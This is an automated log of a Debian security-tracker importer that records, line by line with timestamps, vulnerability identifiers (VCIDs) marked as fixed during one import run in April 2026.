2026-04-03T07:27:17.075182+00:00 Debian Importer Fixing VCID-68kj-s42g-effd https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:17.026376+00:00 Debian Importer Fixing VCID-ezcj-2yaf-rfhh https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:16.977590+00:00 Debian Importer Fixing VCID-ytpg-f9mm-sbev https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:16.929093+00:00 Debian Importer Fixing VCID-93mt-5yvb-zfga https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:16.879619+00:00 Debian Importer Fixing VCID-rqm7-d751-myfa https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:16.821300+00:00 Debian Importer Fixing VCID-vgvf-at1z-8ydr https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:16.763577+00:00 Debian Importer Fixing VCID-gc9p-4vdm-rbah https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:16.706016+00:00 Debian Importer Fixing VCID-pp81-c241-rbb5 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:16.657046+00:00 Debian Importer Fixing VCID-tc3z-912z-afc8 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:16.597459+00:00 Debian Importer Fixing VCID-x998-fhs5-93ht https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:16.536258+00:00 Debian Importer Fixing VCID-xnkt-e7mn-e7du https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:16.484920+00:00 Debian Importer Fixing VCID-152y-9pjj-p7b7 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:16.432274+00:00 Debian Importer Fixing VCID-46ey-s7sy-9qby https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:16.381913+00:00 Debian Importer Fixing VCID-snup-2hn7-sue2 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:16.324424+00:00 Debian Importer Fixing VCID-6zuv-uh18-k3c1 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:16.266331+00:00 Debian Importer Fixing VCID-pj8s-qad1-6qdu https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:16.208264+00:00 Debian Importer Fixing VCID-4az8-8361-7bg2 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:16.150033+00:00 Debian Importer Fixing VCID-rqdx-1pdv-a3bu https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:16.091687+00:00 Debian Importer Fixing VCID-b7u1-bftt-5kck https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:16.042280+00:00 Debian Importer Fixing VCID-m4we-6udg-p7cj https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:15.992428+00:00 Debian Importer Fixing VCID-qrqm-h5se-1kep https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:15.942435+00:00 Debian Importer Fixing VCID-s7tx-uu27-xqb5 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:15.883205+00:00 Debian Importer Fixing VCID-w8gb-1r6a-xud3 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:15.834088+00:00 Debian Importer Fixing VCID-6qqv-wf7w-xfaf https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:15.784627+00:00 Debian Importer Fixing VCID-aej5-sgf8-7uhp https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:15.725549+00:00 Debian Importer Fixing VCID-jn3z-marg-3qgz https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:15.676093+00:00 Debian Importer Fixing VCID-7yur-twpa-n3e1 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:15.617825+00:00 Debian Importer Fixing VCID-kfb4-xnqr-cya6 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:15.559520+00:00 Debian Importer Fixing VCID-177y-cbh1-myay https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:15.509518+00:00 Debian Importer Fixing VCID-rvjq-uks4-x3h3 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:15.450676+00:00 Debian Importer Fixing VCID-gmm9-wk5j-gfh4 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:15.401726+00:00 Debian Importer Fixing VCID-mcef-v74u-pke3 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:15.352157+00:00 Debian Importer Fixing VCID-2dgn-j4dn-9fcd https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:15.293383+00:00 Debian Importer Fixing VCID-zdu5-rtg2-pffb https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:15.235200+00:00 Debian Importer Fixing VCID-rzge-64xp-bfej https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:15.177018+00:00 Debian Importer Fixing VCID-qda9-n7gh-c7c4 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:15.116751+00:00 Debian Importer Fixing VCID-q3v4-jztv-9bbs https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:15.057939+00:00 Debian Importer Fixing VCID-7gya-qyjx-qqfx https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:14.998199+00:00 Debian Importer Fixing VCID-5a4x-wwha-pufn https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:14.939843+00:00 Debian Importer Fixing VCID-wpsv-h9q7-pyep https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:14.880743+00:00 Debian Importer Fixing VCID-jqv2-v42r-7ybf https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:14.821538+00:00 Debian Importer Fixing VCID-12rd-dhh3-h3ea https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:14.763301+00:00 Debian Importer Fixing VCID-ky7v-89bx-3qc8 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:14.714185+00:00 Debian Importer Fixing VCID-z7e5-pt2s-x3a5 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:14.655504+00:00 Debian Importer Fixing VCID-p3vh-b6jn-f3e2 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:14.605369+00:00 Debian Importer Fixing VCID-pwhs-ep5j-pqa7 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:14.556218+00:00 Debian Importer Fixing VCID-9ark-hra3-zyh9 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:14.506532+00:00 Debian Importer Fixing VCID-umnw-ksa8-9ua8 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:14.448114+00:00 Debian Importer Fixing VCID-m31q-v2ue-zyh1 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:14.394760+00:00 Debian Importer Fixing VCID-2r23-hhkx-9fh6 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:14.344771+00:00 Debian Importer Fixing VCID-57gx-fkgs-f7cb https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:14.285153+00:00 Debian Importer Fixing VCID-dkf5-8kww-mkhn https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:14.225709+00:00 Debian Importer Fixing VCID-m2q5-rtqv-tudu https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:14.176309+00:00 Debian Importer Fixing VCID-rhpj-r7ym-7kdn https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:14.127009+00:00 Debian Importer Fixing VCID-b7dh-gjtk-qfhn https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:14.078248+00:00 Debian Importer Fixing VCID-n59p-w7sh-sbhb https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:14.028861+00:00 Debian Importer Fixing VCID-qjrj-rdqd-uqdy https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:13.969948+00:00 Debian Importer Fixing VCID-8n3f-ass1-97gj https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:13.920413+00:00 Debian Importer Fixing VCID-et5y-g25w-4qay https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:13.871219+00:00 Debian Importer Fixing VCID-ryu7-2nsu-kqf6 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:13.809151+00:00 Debian Importer Fixing VCID-15mv-khzp-fqfk https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:13.757753+00:00 Debian Importer Fixing VCID-wwxb-6psb-xybx https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:13.699438+00:00 Debian Importer Fixing VCID-u9v8-n717-fyag https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:13.650527+00:00 Debian Importer Fixing VCID-ur14-3rbn-j3ev https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:13.601351+00:00 Debian Importer Fixing VCID-tnnn-bg52-93a9 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:13.552104+00:00 Debian Importer Fixing VCID-1abc-45xr-5bhb https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:13.503484+00:00 Debian Importer Fixing VCID-5fc9-tutn-dubw https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:13.454109+00:00 Debian Importer Fixing VCID-1e38-tmxy-9kew https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:13.404434+00:00 Debian Importer Fixing VCID-jz9p-mte7-vfb3 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:13.354262+00:00 Debian Importer Fixing VCID-4kxf-5xrh-uue8 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:13.304841+00:00 Debian Importer Fixing VCID-7fw6-fzyj-7qf3 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:13.247561+00:00 Debian Importer Fixing VCID-7jx8-htkz-7qd4 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:13.189185+00:00 Debian Importer Fixing VCID-tzpa-13fk-7kc9 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:13.140842+00:00 Debian Importer Fixing VCID-chgt-azpf-auba https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:13.092033+00:00 Debian Importer Fixing VCID-ypyd-2tg4-xqb1 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:13.043666+00:00 Debian Importer Fixing VCID-1ftp-6fvm-rfez https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:12.994722+00:00 Debian Importer Fixing VCID-kxus-63yw-sufe https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:12.937566+00:00 Debian Importer Fixing VCID-6wy3-xwez-vfej https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:12.878376+00:00 Debian Importer Fixing VCID-uwbu-vzay-q3ak https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:12.828880+00:00 Debian Importer Fixing VCID-8an6-y8xy-pyf3 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:12.779306+00:00 Debian Importer Fixing VCID-rzvc-hba1-zfcy https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:12.709714+00:00 Debian Importer Fixing VCID-nnmr-dnnk-qkc4 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:12.650271+00:00 Debian Importer Fixing VCID-vbgc-23c4-77hu https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:12.600121+00:00 Debian Importer Fixing VCID-1x5f-2jf7-hbb2 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:12.550199+00:00 Debian Importer Fixing VCID-mcry-3vgm-kyh1 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:12.501068+00:00 Debian Importer Fixing VCID-szhs-nysy-6bap https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:12.451856+00:00 Debian Importer Fixing VCID-7ynu-qf57-ykba https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:12.401311+00:00 Debian Importer Fixing VCID-78zg-am5w-gugh https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:12.339980+00:00 Debian Importer Fixing VCID-kd82-724m-77h8 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:12.282213+00:00 Debian Importer Fixing VCID-477e-a2hz-aqb9 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:12.232353+00:00 Debian Importer Fixing VCID-vd3a-e897-8bfn https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:12.182383+00:00 Debian Importer Fixing VCID-rypf-qy6p-3bac https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:12.133022+00:00 Debian Importer Fixing VCID-8862-dh13-hyga https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:12.083452+00:00 Debian Importer Fixing VCID-tnb2-7mvf-sqdk https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:12.034630+00:00 Debian Importer Fixing VCID-zrkc-cfnt-r7hr https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:11.975467+00:00 Debian Importer Fixing VCID-dkzb-3u3f-yuee https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:11.915977+00:00 Debian Importer Fixing VCID-9pr7-aw96-cqfb https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:11.857584+00:00 Debian Importer Fixing VCID-nsn7-a7z8-1qcd https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:11.798893+00:00 Debian Importer Fixing VCID-rwat-s4hf-v7bv https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:11.740842+00:00 Debian Importer Fixing VCID-w9dc-fbc3-mudv https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:11.691317+00:00 Debian Importer Fixing VCID-xy5b-m3h2-hbfj https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:11.632937+00:00 Debian Importer Fixing VCID-m9bk-66wv-vqbk https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:11.574940+00:00 Debian Importer Fixing VCID-qu7h-g9ku-pkct https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:11.516943+00:00 Debian Importer Fixing VCID-t75h-4xfn-h7cd https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:11.458252+00:00 Debian Importer Fixing VCID-bz5u-dqy6-4ucd https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:11.396249+00:00 Debian Importer Fixing VCID-7dh9-2g6c-6qhg https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:11.338367+00:00 Debian Importer Fixing VCID-rzs6-gp7c-vqhc https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:11.278500+00:00 Debian Importer Fixing VCID-9cmk-p7za-wqds https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:11.220256+00:00 Debian Importer Fixing VCID-cjf4-c7t6-hqat https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:11.162061+00:00 Debian Importer Fixing VCID-gx9p-3qdr-ebgw https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:11.104030+00:00 Debian Importer Fixing VCID-mhxv-hu2v-ukeb https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:11.046177+00:00 Debian Importer Fixing VCID-rzzk-7g6m-3yfp https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:10.987598+00:00 Debian Importer Fixing VCID-2495-gquz-9bd1 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:10.929244+00:00 Debian Importer Fixing VCID-6jvf-8pfe-m3cn https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:10.871150+00:00 Debian Importer Fixing VCID-smtf-q6g7-fqen https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:10.812699+00:00 Debian Importer Fixing VCID-azvc-qdxb-7bbu https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:10.754322+00:00 Debian Importer Fixing VCID-3g7r-1s51-akht https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:10.695999+00:00 Debian Importer Fixing VCID-smpj-hz7t-8bhq https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:10.638290+00:00 Debian Importer Fixing VCID-ta5n-gyp1-c3dk https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:10.579014+00:00 Debian Importer Fixing VCID-s747-5kgj-pqeh https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:10.520967+00:00 Debian Importer Fixing VCID-v1f2-upex-43fm https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:10.463188+00:00 Debian Importer Fixing VCID-u29f-6tep-cfdr https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:10.404194+00:00 Debian Importer Fixing VCID-dcde-mybb-bygv https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:10.344241+00:00 Debian Importer Fixing VCID-66hm-jwxw-x3hu https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:10.285584+00:00 Debian Importer Fixing VCID-tqu8-qq9b-gkev https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:10.226568+00:00 Debian Importer Fixing VCID-karw-d7ee-3yhs https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:10.166948+00:00 Debian Importer Fixing VCID-1kxn-kce4-sufx https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:10.107006+00:00 Debian Importer Fixing VCID-12j6-qbjn-m3d7 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:10.045645+00:00 Debian Importer Fixing VCID-1rg8-dsrg-jbet https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:09.987303+00:00 Debian Importer Fixing VCID-85ny-1w5w-57aq https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:09.928090+00:00 Debian Importer Fixing VCID-p2v1-1y51-cfg8 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:09.869276+00:00 Debian Importer Fixing VCID-n5r9-xgvu-skcg https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:09.809505+00:00 Debian Importer Fixing VCID-w1t7-1b22-jqe6 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:09.750018+00:00 Debian Importer Fixing VCID-gs3p-hzxs-kfcq https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:09.677815+00:00 Debian Importer Fixing VCID-jcmt-5fes-jug2 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:09.618982+00:00 Debian Importer Fixing VCID-ap1a-jz5x-ybfv https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:09.560442+00:00 Debian Importer Fixing VCID-5y2n-8d43-vfft https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:09.501537+00:00 Debian Importer Fixing VCID-kert-7sg4-mke5 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:09.443221+00:00 Debian Importer Fixing VCID-mrqv-9kq9-e3h5 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:09.384416+00:00 Debian Importer Fixing VCID-nz2d-nk9v-f7cn https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:09.325898+00:00 Debian Importer Fixing VCID-pbvz-djcm-67eh https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:09.270356+00:00 Debian Importer Fixing VCID-v8ma-knpq-wkdv https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:09.215286+00:00 Debian Importer Fixing VCID-a472-7128-s3eh https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:09.159660+00:00 Debian Importer Fixing VCID-uf32-kpa6-fqe5 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:09.103200+00:00 Debian Importer Fixing VCID-r5v1-hra4-c3ce https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:09.047101+00:00 Debian Importer Fixing VCID-t9u8-a55c-xqhr https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:08.990288+00:00 Debian Importer Fixing VCID-eb86-ytt7-j3gf https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:08.941798+00:00 Debian Importer Fixing VCID-pnk5-26uq-w3cu https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:08.893394+00:00 Debian Importer Fixing VCID-rzz2-km3v-b3hw https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:08.844717+00:00 Debian Importer Fixing VCID-qp4x-w3fe-hyer https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:08.796203+00:00 Debian Importer Fixing VCID-zsxa-yvp8-93fr https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:08.747815+00:00 Debian Importer Fixing VCID-ph82-atva-6kgd https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:08.699173+00:00 Debian Importer Fixing VCID-p3p3-suuz-dycr https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:08.650374+00:00 Debian Importer Fixing VCID-h8cp-df76-c3dz https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:08.602227+00:00 Debian Importer Fixing VCID-dge7-469z-u7gq https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:08.553722+00:00 Debian Importer Fixing VCID-ury3-3x4b-1qh2 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:08.505547+00:00 Debian Importer Fixing VCID-gqgz-418x-skd3 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:08.456604+00:00 Debian Importer Fixing VCID-cz1h-x2a4-zkhj https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:08.407684+00:00 Debian Importer Fixing VCID-q2zg-jh8m-tua2 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:08.357346+00:00 Debian Importer Fixing VCID-zs46-dubn-wfga https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:08.306788+00:00 Debian Importer Fixing VCID-3vc6-9vhj-ckb2 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:08.256841+00:00 Debian Importer Fixing VCID-fzct-psgq-8fcb https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:08.207464+00:00 Debian Importer Fixing VCID-h6ps-ukb8-qfa9 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:08.157756+00:00 Debian Importer Fixing VCID-2wxd-hmac-4fcv https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:08.098839+00:00 Debian Importer Fixing VCID-dzxx-5pbd-fqc4 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:08.050050+00:00 Debian Importer Fixing VCID-9xbc-3nhd-cygp https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:08.001219+00:00 Debian Importer Fixing VCID-crpp-9mt6-nbb6 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:07.951461+00:00 Debian Importer Fixing VCID-paf4-ycea-buae https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:07.902082+00:00 Debian Importer Fixing VCID-xaef-x656-fqfq https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:07.852583+00:00 Debian Importer Fixing VCID-bhkh-rppj-1bb5 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:07.803622+00:00 Debian Importer Fixing VCID-s543-mazj-fqfd https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:07.753996+00:00 Debian Importer Fixing VCID-1q1g-ses8-wqae https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:07.703494+00:00 Debian Importer Fixing VCID-ny9s-4kcr-tbf4 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:07.644746+00:00 Debian Importer Fixing VCID-mvga-q2ts-mqdh https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:07.585944+00:00 Debian Importer Fixing VCID-s4p8-s262-fqfx https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:07.527321+00:00 Debian Importer Fixing VCID-aycq-4vqg-ubgp https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:07.478662+00:00 Debian Importer Fixing VCID-es5w-6nr6-73cn https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:07.419386+00:00 Debian Importer Fixing VCID-hcjv-e7jt-nbbp https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:07.361280+00:00 Debian Importer Fixing VCID-g6mw-mvbu-fbcs https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:07.302678+00:00 Debian Importer Fixing VCID-8v7y-kcz2-bbb9 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:07.244786+00:00 Debian Importer Fixing VCID-6hay-bjuv-nygd https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:07.186946+00:00 Debian Importer Fixing VCID-tv6b-u42h-xkh2 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:07.138133+00:00 Debian Importer Fixing VCID-x3wb-64kk-gues https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:07.089565+00:00 Debian Importer Fixing VCID-jbhc-41ed-guap https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:07.041114+00:00 Debian Importer Fixing VCID-envn-rnvj-4yd2 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:06.992030+00:00 Debian Importer Fixing VCID-mwf4-u6v6-zqdu https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:06.933477+00:00 Debian Importer Fixing VCID-g2k2-5sn8-t7dz https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:06.884840+00:00 Debian Importer Fixing VCID-u9um-rar7-97e8 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:06.826574+00:00 Debian Importer Fixing VCID-uatu-64df-b7b8 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:06.768925+00:00 Debian Importer Fixing VCID-ydbk-11w9-wyen https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:06.705846+00:00 Debian Importer Fixing VCID-93a6-7956-v3ar https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:06.647890+00:00 Debian Importer Fixing VCID-hzr4-8x4m-87cy https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:06.589966+00:00 Debian Importer Fixing VCID-6kep-3ygd-hkbn https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:06.532075+00:00 Debian Importer Fixing VCID-xgu5-jypk-h3bd https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:06.473222+00:00 Debian Importer Fixing VCID-pydk-g827-guc5 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:06.415303+00:00 Debian Importer Fixing VCID-zszf-nytw-jqgx https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:06.355752+00:00 Debian Importer Fixing VCID-y2pd-cxmz-6yfp https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:06.295070+00:00 Debian Importer Fixing VCID-3yqe-cntb-t3fb https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:06.243370+00:00 Debian Importer Fixing VCID-3ubj-wp5c-ruat https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:06.183991+00:00 Debian Importer Fixing VCID-c11x-uq25-17b1 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:06.135542+00:00 Debian Importer Fixing VCID-bge6-p7sc-dqdu https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:06.076915+00:00 Debian Importer Fixing VCID-eqr7-q1ga-8kcr https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:06.019124+00:00 Debian Importer Fixing VCID-46gw-xunr-jqbp https://security-tracker.debian.org/tracker/data/json 38.1.0
